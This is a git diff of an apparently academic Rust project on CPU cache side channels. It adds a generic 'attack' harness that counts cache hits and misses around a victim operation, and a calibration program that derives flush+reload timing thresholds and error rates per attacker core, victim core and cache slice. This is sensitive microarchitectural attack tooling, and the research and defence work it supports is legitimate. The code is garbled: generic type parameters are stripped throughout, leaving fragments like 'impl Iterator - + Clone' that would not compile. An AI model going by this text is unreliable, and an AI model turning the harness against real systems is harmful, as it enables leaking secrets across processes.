+ /// addresses must contain only valid pointers to read.
+ unsafe fn prepare<'a, 'b, 'c>(
+ &'a mut self,
+ addresses: &'b mut (impl Iterator
- + Clone),
+ ) -> Result<(), SideChannelError>;
+ fn victim(&mut self, operation: &dyn Fn());
+
+ /// # Safety
+ ///
+ /// addresses must contain only valid pointers to read.
+ unsafe fn calibrate(
+ &mut self,
+ addresses: impl IntoIterator
- + Clone,
+ ) -> Result<(), ChannelFatalError>;
+}
+
+impl SingleAddrCacheSideChannel for T {
+ unsafe fn test_single(&mut self, addr: *const u8) -> Result {
+ let addresses = vec![addr];
+ unsafe { self.test(&mut addresses.iter()) }.map(|v| v[0].1)
+ }
+
+ unsafe fn prepare_single(&mut self, addr: *const u8) -> Result<(), SideChannelError> {
+ let addresses = vec![addr];
+ unsafe { self.prepare(&mut addresses.iter()) }
+ }
+
+ fn victim_single(&mut self, operation: &dyn Fn()) {
+ self.victim(operation);
+ }
+
+ unsafe fn calibrate_single(
+ &mut self,
+ addresses: impl IntoIterator
- + Clone,
+ ) -> Result<(), ChannelFatalError> {
+ unsafe { self.calibrate(addresses) }
+ }
+}
+
+#[cfg(test)]
+mod tests {
+ #[test]
+ fn it_works() {
+ assert_eq!(2 + 2, 4);
+ }
+}
diff --git a/cache_side_channel/src/table_side_channel.rs b/cache_side_channel/src/table_side_channel.rs
new file mode 100644
index 0000000..5538f50
--- /dev/null
+++ b/cache_side_channel/src/table_side_channel.rs
@@ -0,0 +1,219 @@
+use crate::{
+ CacheStatus, ChannelFatalError, MultipleAddrCacheSideChannel, SideChannelError,
+ SingleAddrCacheSideChannel,
+};
+
+use std::collections::HashMap;
+
+pub struct TableAttackResult {
+ pub addr: *const u8,
+ hit: u32,
+ miss: u32,
+}
+
+impl TableAttackResult {
+ pub fn get(&self, cache_status: CacheStatus) -> u32 {
+ match cache_status {
+ CacheStatus::Hit => self.hit,
+ CacheStatus::Miss => self.miss,
+ }
+ }
+}
+
+pub trait TableCacheSideChannel {
+ //type ChannelFatalError: Debug;
+ /// # Safety
+ ///
+ /// addresses must contain only valid pointers to read.
+ unsafe fn calibrate(
+ &mut self,
+ addresses: impl IntoIterator
- + Clone,
+ ) -> Result<(), ChannelFatalError>;
+ /// # Safety
+ ///
+ /// addresses must contain only valid pointers to read.
+ unsafe fn attack<'a, 'b, 'c>(
+ &'a mut self,
+ addresses: impl Iterator
- + Clone,
+ victim: &'b dyn Fn(),
+ num_iteration: u32,
+ ) -> Result, ChannelFatalError>;
+}
+
+impl TableCacheSideChannel for T {
+ default unsafe fn calibrate(
+ &mut self,
+ addresses: impl IntoIterator
- + Clone,
+ ) -> Result<(), ChannelFatalError> {
+ unsafe { self.calibrate_single(addresses) }
+ }
+ //type ChannelFatalError = T::SingleChannelFatalError;
+
+ default unsafe fn attack<'a, 'b, 'c>(
+ &'a mut self,
+ addresses: impl Iterator
- + Clone,
+ victim: &'b dyn Fn(),
+ num_iteration: u32,
+ ) -> Result, ChannelFatalError> {
+ let mut result = Vec::new();
+
+ for addr in addresses {
+ let mut hit = 0;
+ let mut miss = 0;
+ for iteration in 0..100 {
+ match unsafe { self.prepare_single(*addr) } {
+ Ok(_) => {}
+ Err(e) => match e {
+ SideChannelError::NeedRecalibration => unimplemented!(),
+ SideChannelError::FatalError(e) => return Err(e),
+ SideChannelError::AddressNotReady(_addr) => panic!(),
+ SideChannelError::AddressNotCalibrated(_addr) => unimplemented!(),
+ },
+ }
+ self.victim_single(victim);
+ let r = unsafe { self.test_single(*addr) };
+ match r {
+ Ok(status) => {}
+ Err(e) => match e {
+ SideChannelError::NeedRecalibration => panic!(),
+ SideChannelError::FatalError(e) => {
+ return Err(e);
+ }
+ _ => panic!(),
+ },
+ }
+ }
+ for _iteration in 0..num_iteration {
+ match unsafe { self.prepare_single(*addr) } {
+ Ok(_) => {}
+ Err(e) => match e {
+ SideChannelError::NeedRecalibration => unimplemented!(),
+ SideChannelError::FatalError(e) => return Err(e),
+ SideChannelError::AddressNotReady(_addr) => panic!(),
+ SideChannelError::AddressNotCalibrated(_addr) => unimplemented!(),
+ },
+ }
+ self.victim_single(victim);
+ let r = unsafe { self.test_single(*addr) };
+ match r {
+ Ok(status) => match status {
+ CacheStatus::Hit => {
+ hit += 1;
+ }
+ CacheStatus::Miss => {
+ miss += 1;
+ }
+ },
+ Err(e) => match e {
+ SideChannelError::NeedRecalibration => panic!(),
+ SideChannelError::FatalError(e) => {
+ return Err(e);
+ }
+ _ => panic!(),
+ },
+ }
+ }
+ result.push(TableAttackResult {
+ addr: *addr,
+ hit,
+ miss,
+ });
+ }
+ Ok(result)
+ }
+}
+
+// TODO limit number of simultaneous tested address + randomise order ?
+
+impl TableCacheSideChannel for T {
+ unsafe fn calibrate(
+ &mut self,
+ addresses: impl IntoIterator
- + Clone,
+ ) -> Result<(), ChannelFatalError> {
+ unsafe { self.calibrate(addresses) }
+ }
+ //type ChannelFatalError = T::MultipleChannelFatalError;
+
+ /// # Safety
+ ///
+ /// addresses must contain only valid pointers to read.
+ unsafe fn attack<'a, 'b, 'c>(
+ &'a mut self,
+ mut addresses: impl Iterator
- + Clone,
+ victim: &'b dyn Fn(),
+ num_iteration: u32,
+ ) -> Result, ChannelFatalError> {
+ let mut v = Vec::new();
+ while let Some(addr) = addresses.next() {
+ let mut batch = Vec::new();
+ batch.push(*addr);
+ let mut hits: HashMap<*const u8, u32> = HashMap::new();
+ let mut misses: HashMap<*const u8, u32> = HashMap::new();
+ for i in 1..T::MAX_ADDR {
+ if let Some(addr) = addresses.next() {
+ batch.push(*addr);
+ } else {
+ break;
+ }
+ }
+ for i in 0..100 {
+ // TODO Warmup
+ }
+ for i in 0..num_iteration {
+ match unsafe { MultipleAddrCacheSideChannel::prepare(self, &mut batch.iter()) } {
+ Ok(_) => {}
+ Err(e) => match e {
+ SideChannelError::NeedRecalibration => unimplemented!(),
+ SideChannelError::FatalError(e) => return Err(e),
+ SideChannelError::AddressNotReady(_addr) => panic!(),
+ SideChannelError::AddressNotCalibrated(addr) => {
+ eprintln!(
+ "Addr: {:p}\n\
+ {:#?}",
+ addr, self
+ );
+ unimplemented!()
+ }
+ },
+ }
+ MultipleAddrCacheSideChannel::victim(self, victim);
+
+ let r = unsafe { MultipleAddrCacheSideChannel::test(self, &mut batch.iter()) }; // Fixme error handling
+ match r {
+ Err(e) => match e {
+ SideChannelError::NeedRecalibration => {
+ panic!();
+ }
+ SideChannelError::FatalError(e) => {
+ return Err(e);
+ }
+ _ => {
+ panic!();
+ }
+ },
+ Ok(vector) => {
+ for (addr, status) in vector {
+ match status {
+ CacheStatus::Hit => {
+ *hits.entry(addr).or_default() += 1;
+ }
+ CacheStatus::Miss => {
+ *misses.entry(addr).or_default() += 1;
+ }
+ }
+ }
+ }
+ }
+ }
+
+ for addr in batch {
+ v.push(TableAttackResult {
+ addr,
+ hit: *hits.get(&addr).unwrap_or(&0u32),
+ miss: *misses.get(&addr).unwrap_or(&0u32),
+ })
+ }
+ }
+ Ok(v)
+ }
+}
diff --git a/cache_utils/extract_analysis_csv.sh b/cache_utils/extract_analysis_csv.sh
new file mode 100755
index 0000000..7002030
--- /dev/null
+++ b/cache_utils/extract_analysis_csv.sh
@@ -0,0 +1,4 @@
+#!/bin/sh
+grep '^Analysis:' "$1.txt" | cut -b 10- > "$1.csv"
+grep '^AVAnalysis:' "$1.txt" | cut -b 12- > "$1.AV.csv"
+grep '^AttackerAnalysis:' "$1.txt" | cut -b 18- > "$1.A.csv"
diff --git a/cache_utils/src/bin/two_thread_cal.rs b/cache_utils/src/bin/two_thread_cal.rs
index ead1481..2f58922 100644
--- a/cache_utils/src/bin/two_thread_cal.rs
+++ b/cache_utils/src/bin/two_thread_cal.rs
@@ -1,7 +1,9 @@
use cache_utils::calibration::{
- calibrate_fixed_freq_2_thread, flush_and_reload, get_cache_slicing, load_and_flush, only_flush,
- only_reload, reload_and_flush, CalibrateOperation2T, CalibrateResult2T, CalibrationOptions,
- HistParams, Verbosity, CFLUSH_BUCKET_NUMBER, CFLUSH_BUCKET_SIZE, CFLUSH_NUM_ITER,
+ accumulate, calibrate_fixed_freq_2_thread, calibration_result_to_ASVP, flush_and_reload,
+ get_cache_slicing, load_and_flush, map_values, only_flush, only_reload, reduce,
+ reload_and_flush, CalibrateOperation2T, CalibrateResult2T, CalibrationOptions, ErrorPrediction,
+ ErrorPredictions, HistParams, HistogramCumSum, PotentialThresholds, ThresholdError, Verbosity,
+ ASP, ASVP, AV, CFLUSH_BUCKET_NUMBER, CFLUSH_BUCKET_SIZE, CFLUSH_NUM_ITER, SP, SVP,
};
use cache_utils::mmap::MMappedMemory;
use cache_utils::{flush, maccess, noop};
@@ -10,6 +12,7 @@ use nix::unistd::Pid;
use core::arch::x86_64 as arch_x86;
+use std::cmp::Ordering;
use std::collections::HashMap;
use std::process::Command;
use std::str::from_utf8;
@@ -49,6 +52,8 @@ struct ResultAnalysis {
pub min_error_mlh: u32,
}
+// Split the threshold and error in two separate structs ?
+
#[derive(Debug, Clone, Copy)]
struct Threshold {
pub error_rate: f32,
@@ -104,77 +109,76 @@ fn main() {
let verbose_level = Verbosity::RawResult;
- unsafe {
- let pointer = (&array[0]) as *const u8;
+ let pointer = (&array[0]) as *const u8;
+ if pointer as usize & (cache_line_size - 1) != 0 {
+ panic!("not aligned nicely");
+ }
- if pointer as usize & (cache_line_size - 1) != 0 {
- panic!("not aligned nicely");
- }
+ let operations = [
+ CalibrateOperation2T {
+ prepare: maccess::,
+ op: only_flush,
+ name: "clflush_remote_hit",
+ display_name: "clflush remote hit",
+ },
+ CalibrateOperation2T {
+ prepare: maccess::,
+ op: load_and_flush,
+ name: "clflush_shared_hit",
+ display_name: "clflush shared hit",
+ },
+ CalibrateOperation2T {
+ prepare: flush,
+ op: only_flush,
+ name: "clflush_miss_f",
+ display_name: "clflush miss - f",
+ },
+ CalibrateOperation2T {
+ prepare: flush,
+ op: load_and_flush,
+ name: "clflush_local_hit_f",
+ display_name: "clflush local hit - f",
+ },
+ CalibrateOperation2T {
+ prepare: noop::,
+ op: only_flush,
+ name: "clflush_miss_n",
+ display_name: "clflush miss - n",
+ },
+ CalibrateOperation2T {
+ prepare: noop::,
+ op: load_and_flush,
+ name: "clflush_local_hit_n",
+ display_name: "clflush local hit - n",
+ },
+ CalibrateOperation2T {
+ prepare: noop::,
+ op: flush_and_reload,
+ name: "reload_miss",
+ display_name: "reload miss",
+ },
+ CalibrateOperation2T {
+ prepare: maccess::,
+ op: reload_and_flush,
+ name: "reload_remote_hit",
+ display_name: "reload remote hit",
+ },
+ CalibrateOperation2T {
+ prepare: maccess::,
+ op: only_reload,
+ name: "reload_shared_hit",
+ display_name: "reload shared hit",
+ },
+ CalibrateOperation2T {
+ prepare: noop::,
+ op: only_reload,
+ name: "reload_local_hit",
+ display_name: "reload local hit",
+ },
+ ];
- let operations = [
- CalibrateOperation2T {
- prepare: maccess::,
- op: only_flush,
- name: "clflush_remote_hit",
- display_name: "clflush remote hit",
- },
- CalibrateOperation2T {
- prepare: maccess::,
- op: load_and_flush,
- name: "clflush_shared_hit",
- display_name: "clflush shared hit",
- },
- CalibrateOperation2T {
- prepare: flush,
- op: only_flush,
- name: "clflush_miss_f",
- display_name: "clflush miss - f",
- },
- CalibrateOperation2T {
- prepare: flush,
- op: load_and_flush,
- name: "clflush_local_hit_f",
- display_name: "clflush local hit - f",
- },
- CalibrateOperation2T {
- prepare: noop::,
- op: only_flush,
- name: "clflush_miss_n",
- display_name: "clflush miss - n",
- },
- CalibrateOperation2T {
- prepare: noop::,
- op: load_and_flush,
- name: "clflush_local_hit_n",
- display_name: "clflush local hit - n",
- },
- CalibrateOperation2T {
- prepare: noop::,
- op: flush_and_reload,
- name: "reload_miss",
- display_name: "reload miss",
- },
- CalibrateOperation2T {
- prepare: maccess::,
- op: reload_and_flush,
- name: "reload_remote_hit",
- display_name: "reload remote hit",
- },
- CalibrateOperation2T {
- prepare: maccess::,
- op: only_reload,
- name: "reload_shared_hit",
- display_name: "reload shared hit",
- },
- CalibrateOperation2T {
- prepare: noop::,
- op: only_reload,
- name: "reload_local_hit",
- display_name: "reload local hit",
- },
- ];
-
- let r = calibrate_fixed_freq_2_thread(
+ let r = unsafe {
+ calibrate_fixed_freq_2_thread(
pointer,
64, // FIXME : MAGIC
array.len() as isize >> 3, // MAGIC
@@ -190,152 +194,503 @@ fn main() {
optimised_addresses: true,
},
core_per_socket,
- );
+ )
+ };
- let mut analysis = HashMap::::new();
+ //let mut analysis = HashMap::::new();
- let miss_name = "clflush_miss_n";
- let hit_name = "clflush_remote_hit";
+ let miss_name = "clflush_miss_n";
+ let hit_name = "clflush_remote_hit";
- let miss_index = operations
- .iter()
- .position(|op| op.name == miss_name)
- .unwrap();
- let hit_index = operations
- .iter()
- .position(|op| op.name == hit_name)
- .unwrap();
+ let miss_index = operations
+ .iter()
+ .position(|op| op.name == miss_name)
+ .unwrap();
+ let hit_index = operations
+ .iter()
+ .position(|op| op.name == hit_name)
+ .unwrap();
- let slicing = get_cache_slicing(core_per_socket);
+ let slicing = get_cache_slicing(core_per_socket);
- let h = if let Some(s) = slicing {
- if s.can_hash() {
- |addr: usize| -> u8 { slicing.unwrap().hash(addr).unwrap() }
- } else {
- panic!("No slicing function known");
- }
+ let h = if let Some(s) = slicing {
+ if s.can_hash() {
+ |addr: usize| -> u8 { slicing.unwrap().hash(addr).unwrap() }
} else {
panic!("No slicing function known");
- };
-
- for result in r {
- match result.res {
- Err(e) => {
- eprintln!("Ooops : {:#?}", e);
- panic!()
- }
- Ok(results) => {
- for r in results {
- let offset = r.offset;
- let miss_hist = &r.histogram[miss_index];
- let hit_hist = &r.histogram[hit_index];
-
- if miss_hist.len() != hit_hist.len() {
- panic!("Maformed results");
- }
- let len = miss_hist.len();
- let mut miss_cum_sum = vec![0; len];
- let mut hit_cum_sum = vec![0; len];
- miss_cum_sum[0] = miss_hist[0];
- hit_cum_sum[0] = hit_hist[0];
- for i in 1..len {
- miss_cum_sum[i] = miss_hist[i] + miss_cum_sum[i - 1];
- hit_cum_sum[i] = hit_hist[i] + hit_cum_sum[i - 1];
- }
- let miss_total = miss_cum_sum[len - 1];
- let hit_total = hit_cum_sum[len - 1];
-
- let mut error_miss_less_than_hit = vec![0; len - 1];
- let mut error_hit_less_than_miss = vec![0; len - 1];
-
- let mut min_error_hlm = u32::max_value();
- let mut min_error_mlh = u32::max_value();
-
- for i in 0..(len - 1) {
- error_hit_less_than_miss[i] =
- miss_cum_sum[i] + (hit_total - hit_cum_sum[i]);
- error_miss_less_than_hit[i] =
- hit_cum_sum[i] + (miss_total - miss_cum_sum[i]);
-
- if error_hit_less_than_miss[i] < min_error_hlm {
- min_error_hlm = error_hit_less_than_miss[i];
- }
- if error_miss_less_than_hit[i] < min_error_mlh {
- min_error_mlh = error_miss_less_than_hit[i];
- }
- }
-
- analysis.insert(
- ASV {
- attacker: result.main_core as u8,
- slice: h(offset as usize),
- victim: result.helper_core as u8,
- },
- ResultAnalysis {
- miss: miss_hist.clone(),
- miss_cum_sum,
- miss_total,
- hit: hit_hist.clone(),
- hit_cum_sum,
- hit_total,
- error_miss_less_than_hit,
- error_hit_less_than_miss,
- min_error_hlm,
- min_error_mlh,
- },
- );
- }
- }
- }
}
- let mut thresholds = HashMap::new();
- for (asv, results) in analysis {
- let hlm = results.min_error_hlm < results.min_error_mlh;
- let (errors, min_error) = if hlm {
- (&results.error_hit_less_than_miss, results.min_error_hlm)
- } else {
- (&results.error_miss_less_than_hit, results.min_error_mlh)
+ } else {
+ panic!("No slicing function known");
+ };
+
+ /* Analysis Flow
+ Vec (or Vec) -> Corresponding ASVP + Analysis (use the type from two_thread_cal, or similar)
+ ASVP,Analysis -> ASVP,Thresholds,Error
+ ASVP,Analysis -> ASP,Analysis (mobile victim) -> ASP, Threshold, Error -> ASVP detailed Threshold,Error in ASP model
+ ASVP,Analysis -> SP, Analysis (mobile A and V) -> SP, Threshold, Error -> ASVP detailed Threshold,Error in SP model
+ ASVP,Analysis -> AV, Analysis (legacy attack) -> AV, Threshold, Error -> ASVP detailed Threshold,Error in AV model
+ ASVP,Analysis -> Global Analysis -> Global Threshold, Error -> ASVP detailed Threshold,Error in Global Model
+ The last step is done as a apply operation on original ASVP Analysis using the new Thresholds.
+
+ This model correspond to an attacker that can chose its core and its victim core, and has slice knowledge
+ ASVP,Thresholds,Error -> Best AV selection for average error. HashMap)>
+
+ This model corresponds to an attacker that can chose its own core, measure victim location, and has slice knowledge.
+ ASVP,Thresholds,Error -> Best A selection for average error. HashMap)>
+
+ Also compute best AV pair for AV model
+
+ What about chosing A but no knowing V at all, from ASP detiled analysis ?
+
+
+
+
+ Compute for each model averages, worst and best cases ?
+
+ */
+
+ let new_analysis: Result, nix::Error> =
+ calibration_result_to_ASVP(
+ r,
+ pointer,
+ |cal_1t_res| {
+ ErrorPredictions::predict_errors(HistogramCumSum::from_calibrate(
+ cal_1t_res, hit_index, miss_index,
+ ))
+ },
+ &h,
+ );
+
+ // Analysis aka HashMap --------------------------------------
+
+ let asvp_analysis = match new_analysis {
+ Ok(a) => a,
+ Err(e) => panic!("Error: {}", e),
+ };
+
+ asvp_analysis[&ASVP {
+ attacker: 0,
+ slice: 0,
+ victim: 0,
+ page: pointer as usize,
+ }]
+ .debug();
+
+ let asp_analysis = accumulate(
+ asvp_analysis.clone(),
+ |asvp: ASVP| ASP {
+ attacker: asvp.attacker,
+ slice: asvp.slice,
+ page: asvp.page,
+ },
+ || ErrorPredictions::empty(CFLUSH_BUCKET_NUMBER),
+ |accumulator: &mut ErrorPredictions, error_preds: ErrorPredictions, _key, _rkey| {
+ *accumulator += error_preds;
+ },
+ );
+
+ let sp_analysis = accumulate(
+ asp_analysis.clone(),
+ |asp: ASP| SP {
+ slice: asp.slice,
+ page: asp.page,
+ },
+ || ErrorPredictions::empty(CFLUSH_BUCKET_NUMBER),
+ |accumulator: &mut ErrorPredictions, error_preds: ErrorPredictions, _key, _rkey| {
+ *accumulator += error_preds;
+ },
+ );
+
+ // This one is the what would happen if you ignored slices
+ let av_analysis = accumulate(
+ asvp_analysis.clone(),
+ |asvp: ASVP| AV {
+ attacker: asvp.attacker,
+ victim: asvp.victim,
+ },
+ || ErrorPredictions::empty(CFLUSH_BUCKET_NUMBER),
+ |accumulator: &mut ErrorPredictions, error_preds: ErrorPredictions, _key, _rkey| {
+ *accumulator += error_preds;
+ },
+ );
+
+ let global_analysis = accumulate(
+ av_analysis.clone(),
+ |_av: AV| (),
+ || ErrorPredictions::empty(CFLUSH_BUCKET_NUMBER),
+ |accumulator: &mut ErrorPredictions, error_preds: ErrorPredictions, _key, _rkey| {
+ *accumulator += error_preds;
+ },
+ )
+ .remove(&())
+ .unwrap();
+
+ // Thresholds aka HashMap ---------------------------------------
+
+ let asvp_threshold_errors: HashMap = map_values(
+ asvp_analysis.clone(),
+ |error_predictions: ErrorPredictions, _| {
+ PotentialThresholds::minimizing_total_error(error_predictions)
+ .median()
+ .unwrap()
+ },
+ );
+
+ let asp_threshold_errors =
+ map_values(asp_analysis, |error_predictions: ErrorPredictions, _| {
+ PotentialThresholds::minimizing_total_error(error_predictions)
+ .median()
+ .unwrap()
+ });
+
+ let sp_threshold_errors = map_values(sp_analysis, |error_predictions: ErrorPredictions, _| {
+ PotentialThresholds::minimizing_total_error(error_predictions)
+ .median()
+ .unwrap()
+ });
+
+ let av_threshold_errors = map_values(av_analysis, |error_predictions: ErrorPredictions, _| {
+ PotentialThresholds::minimizing_total_error(error_predictions)
+ .median()
+ .unwrap()
+ });
+
+ let gt_threshold_error = PotentialThresholds::minimizing_total_error(global_analysis)
+ .median()
+ .unwrap();
+
+ // ASVP detailed Threshold,Error in strict subset of ASVP model --------------------------------
+ // HashMap,
+ // with the same threshold for all the ASVP sharing the same value of an ASVP subset.
+
+ let asp_detailed_errors: HashMap = map_values(
+ asvp_analysis.clone(),
+ |error_pred: ErrorPredictions, asvp: &ASVP| {
+ let asp = ASP {
+ attacker: asvp.attacker,
+ slice: asvp.slice,
+ page: asvp.page,
};
+ let threshold = asp_threshold_errors[&asp].threshold;
+ let error = error_pred.histogram.error_for_threshold(threshold);
+ ThresholdError { threshold, error }
+ },
+ );
- let mut threshold_vec = Vec::new();
+ let sp_detailed_errors: HashMap = map_values(
+ asvp_analysis.clone(),
+ |error_pred: ErrorPredictions, asvp: &ASVP| {
+ let sp = SP {
+ slice: asvp.slice,
+ page: asvp.page,
+ };
+ let threshold = sp_threshold_errors[&sp].threshold;
+ let error = error_pred.histogram.error_for_threshold(threshold);
+ ThresholdError { threshold, error }
+ },
+ );
- // refactor some of this logic into methods of analysis ?
+ let av_detailed_errors: HashMap = map_values(
+ asvp_analysis.clone(),
+ |error_pred: ErrorPredictions, asvp: &ASVP| {
+ let av = AV {
+ attacker: asvp.attacker,
+ victim: asvp.victim,
+ };
+ let threshold = av_threshold_errors[&av].threshold;
+ let error = error_pred.histogram.error_for_threshold(threshold);
+ ThresholdError { threshold, error }
+ },
+ );
- for i in 0..errors.len() {
- if errors[i] == min_error {
- let num_true_hit;
- let num_false_hit;
- let num_true_miss;
- let num_false_miss;
- if hlm {
- num_true_hit = results.hit_cum_sum[i];
- num_false_hit = results.miss_cum_sum[i];
- num_true_miss = results.miss_total - num_false_hit;
- num_false_miss = results.hit_total - num_true_hit;
- } else {
- num_true_miss = results.miss_cum_sum[i];
- num_false_miss = results.hit_cum_sum[i];
- num_true_hit = results.hit_total - num_false_miss;
- num_false_hit = results.miss_total - num_true_miss;
- }
- threshold_vec.push(Threshold {
- threshold: i,
- is_hlm: hlm,
- num_true_hit,
- num_false_hit,
- num_true_miss,
- num_false_miss,
- error_rate: min_error as f32
- / (results.hit_total + results.miss_total) as f32,
- })
- }
- /*
+ let gt_detailed_errors: HashMap =
+ map_values(asvp_analysis.clone(), |error_pred: ErrorPredictions, _| {
+ let threshold = gt_threshold_error.threshold;
+ let error = error_pred.histogram.error_for_threshold(threshold);
+ ThresholdError { threshold, error }
+ });
- */
- }
- thresholds.insert(asv, threshold_vec);
+ // Best core selections
+
+ let asvp_best_av_errors: HashMap)> =
+ accumulate(
+ asvp_threshold_errors.clone(),
+ |asvp: ASVP| AV {
+ attacker: asvp.attacker,
+ victim: asvp.victim,
+ },
+ || (ErrorPrediction::default(), HashMap::new()),
+ |acc: &mut (ErrorPrediction, HashMap),
+ threshold_error,
+ asvp: ASVP,
+ av| {
+ assert_eq!(av.attacker, asvp.attacker);
+ assert_eq!(av.victim, asvp.victim);
+ let sp = SP {
+ slice: asvp.slice,
+ page: asvp.page,
+ };
+ acc.0 += threshold_error.error;
+ acc.1.insert(sp, threshold_error);
+ },
+ );
+
+ let asvp_best_a_errors: HashMap)> =
+ accumulate(
+ asvp_threshold_errors.clone(),
+ |asvp: ASVP| asvp.attacker,
+ || (ErrorPrediction::default(), HashMap::new()),
+ |acc: &mut (ErrorPrediction, HashMap),
+ threshold_error,
+ asvp: ASVP,
+ attacker| {
+ assert_eq!(attacker, asvp.attacker);
+ let svp = SVP {
+ slice: asvp.slice,
+ page: asvp.page,
+ victim: asvp.victim,
+ };
+ acc.0 += threshold_error.error;
+ acc.1.insert(svp, threshold_error);
+ },
+ );
+
+ let asp_best_a_errors: HashMap)> =
+ accumulate(
+ asp_detailed_errors.clone(),
+ |asvp: ASVP| asvp.attacker,
+ || (ErrorPrediction::default(), HashMap::new()),
+ |acc: &mut (ErrorPrediction, HashMap),
+ threshold_error,
+ asvp: ASVP,
+ attacker| {
+ assert_eq!(attacker, asvp.attacker);
+ let svp = SVP {
+ slice: asvp.slice,
+ page: asvp.page,
+ victim: asvp.victim,
+ };
+ acc.0 += threshold_error.error;
+ acc.1.insert(svp, threshold_error);
+ },
+ );
+
+ //let av_best_av_errors
+ let av_best_a_erros: HashMap)> =
+ accumulate(
+ av_detailed_errors.clone(),
+ |asvp: ASVP| asvp.attacker,
+ || (ErrorPrediction::default(), HashMap::new()),
+ |acc: &mut (ErrorPrediction, HashMap),
+ threshold_error,
+ asvp: ASVP,
+ attacker| {
+ assert_eq!(attacker, asvp.attacker);
+ let svp = SVP {
+ slice: asvp.slice,
+ page: asvp.page,
+ victim: asvp.victim,
+ };
+ acc.0 += threshold_error.error;
+ acc.1.insert(svp, threshold_error);
+ },
+ );
+
+ // Find best index in each model...
+
+ // CSV output logic
+
+ /* moving parts :
+ - order of lines
+ - columns and columns header.
+ - Probably should be a macro ?
+ Or something taking a Vec of Column and getter, plus a vec (or iterator) of 'Keys'
+ */
+
+ let mut keys = asvp_threshold_errors.keys().collect::>();
+ keys.sort_unstable_by(|a: &&ASVP, b: &&ASVP| {
+ if a.page > b.page {
+ Ordering::Greater
+ } else if a.page < b.page {
+ Ordering::Less
+ } else if a.slice > b.slice {
+ Ordering::Greater
+ } else if a.slice < b.slice {
+ Ordering::Less
+ } else if a.attacker > b.attacker {
+ Ordering::Greater
+ } else if a.attacker < b.attacker {
+ Ordering::Less
+ } else if a.victim > b.victim {
+ Ordering::Greater
+ } else if a.victim < b.victim {
+ Ordering::Less
+ } else {
+ Ordering::Equal
}
- eprintln!("Thresholds :\n{:#?}", thresholds);
- println!("Thresholds :\n{:#?}", thresholds);
+ });
+
+ // In theory there should be a way of making such code much more modular.
+
+ let error_header = |name: &str| {
+ format!(
+ "{}ErrorRate,{}Errors,{}Measures,{}TrueHit,{}TrueMiss,{}FalseHit,{}FalseMiss",
+ name, name, name, name, name, name, name
+ )
+ };
+
+ let header = |name: &str| {
+ format!(
+ "{}_Threshold,{}_MFH,{}_GlobalErrorRate,{}",
+ name,
+ name,
+ name,
+ error_header(&format!("{}_ASVP", name))
+ )
+ };
+
+ println!(
+ "Analysis:Page,Slice,Attacker,Victim,ASVP_Threshold,ASVP_MFH,{},{},{},{},{}",
+ error_header("ASVP_"),
+ header("ASP"),
+ header("SP"),
+ header("AV"),
+ header("GT")
+ );
+
+ let format_error = |error_pred: &ErrorPrediction| {
+ format!(
+ "{},{},{},{},{},{},{}",
+ error_pred.error_rate(),
+ error_pred.total_error(),
+ error_pred.total(),
+ error_pred.true_hit,
+ error_pred.true_miss,
+ error_pred.false_hit,
+ error_pred.false_miss
+ )
+ };
+
+ let format_detailed_model = |global: &ThresholdError, detailed: &ThresholdError| {
+ assert_eq!(global.threshold, detailed.threshold);
+ format!(
+ "{},{},{},{}",
+ global.threshold.bucket_index,
+ global.threshold.miss_faster_than_hit,
+ global.error.error_rate(),
+ format_error(&detailed.error)
+ )
+ };
+
+ for key in keys {
+ print!(
+ "Analysis:{},{},{},{},",
+ key.page, key.slice, key.attacker, key.victim
+ );
+ let threshold_error = asvp_threshold_errors[key];
+ print!(
+ "{},{},{},",
+ threshold_error.threshold.bucket_index,
+ threshold_error.threshold.miss_faster_than_hit,
+ format_error(&threshold_error.error)
+ );
+
+ let asp_global = &asp_threshold_errors[&ASP {
+ attacker: key.attacker,
+ slice: key.slice,
+ page: key.page,
+ }];
+ let asp_detailed = &asp_detailed_errors[key];
+ print!("{},", format_detailed_model(asp_global, asp_detailed));
+
+ let sp_global = &sp_threshold_errors[&SP {
+ slice: key.slice,
+ page: key.page,
+ }];
+ let sp_detailed = &sp_detailed_errors[key];
+ print!("{},", format_detailed_model(sp_global, sp_detailed));
+
+ let av_global = &av_threshold_errors[&AV {
+ attacker: key.attacker,
+ victim: key.victim,
+ }];
+ let av_detailed = &av_detailed_errors[key];
+ print!("{},", format_detailed_model(av_global, av_detailed));
+
+ let gt_global = >_threshold_error;
+ let gt_detailed = >_detailed_errors[key];
+ print!("{},", format_detailed_model(gt_global, gt_detailed));
+ println!();
}
+
+ //The two other CSV are summaries that allowdetermining the best case. Index in the first CSV for the detailed info.
+ // Second CSV output logic:
+
+ // Build keys
+ let mut keys = asvp_best_av_errors.keys().collect::>();
+ keys.sort_unstable_by(|a: &&AV, b: &&AV| {
+ if a.attacker > b.attacker {
+ Ordering::Greater
+ } else if a.attacker < b.attacker {
+ Ordering::Less
+ } else if a.victim > b.victim {
+ Ordering::Greater
+ } else if a.victim < b.victim {
+ Ordering::Less
+ } else {
+ Ordering::Equal
+ }
+ });
+
+ // Print header
+ println!(
+ "AVAnalysis:Attacker,Victim,{},{}",
+ error_header("AVSP_Best_AV_"),
+ error_header("AV_Best_AV_")
+ );
+ //print lines
+
+ for av in keys {
+ println!(
+ "AVAnalysis:{attacker},{victim},{AVSP},{AV}",
+ attacker = av.attacker,
+ victim = av.victim,
+ AVSP = format_error(&asvp_best_av_errors[av].0),
+ AV = format_error(&av_threshold_errors[av].error),
+ );
+ }
+
+ // Third CSV output logic:
+
+ // Build keys
+ let mut keys = asvp_best_a_errors.keys().collect::>();
+ keys.sort_unstable();
+
+ println!(
+ "AttackerAnalysis:Attacker,{},{},{}",
+ error_header("AVSP_Best_A_"),
+ error_header("ASP_Best_A_"),
+ error_header("AV_Best_A_"),
+ );
+
+ for attacker in keys {
+ println!(
+ "AttackerAnalysis:{attacker},{AVSP},{ASP},{AV}",
+ attacker = attacker,
+ AVSP = format_error(&asvp_best_a_errors[&attacker].0),
+ ASP = format_error(&asp_best_a_errors[&attacker].0),
+ AV = format_error(&av_best_a_erros[&attacker].0)
+ );
+ }
+
+ /*
+ println!(
+ "analysis result: {:?}",
+ asvp_threshold_errors.keys().copied().collect::>()
+ );
+ println!("Global Analysis: {:#?}", global_threshold_errors);
+ println!(
+ "Global thrshold total error rate :{}",
+ global_threshold_errors.error.error_rate()
+ );*/
}
diff --git a/cache_utils/src/calibration.rs b/cache_utils/src/calibration.rs
index 9e4219c..99c52a9 100644
--- a/cache_utils/src/calibration.rs
+++ b/cache_utils/src/calibration.rs
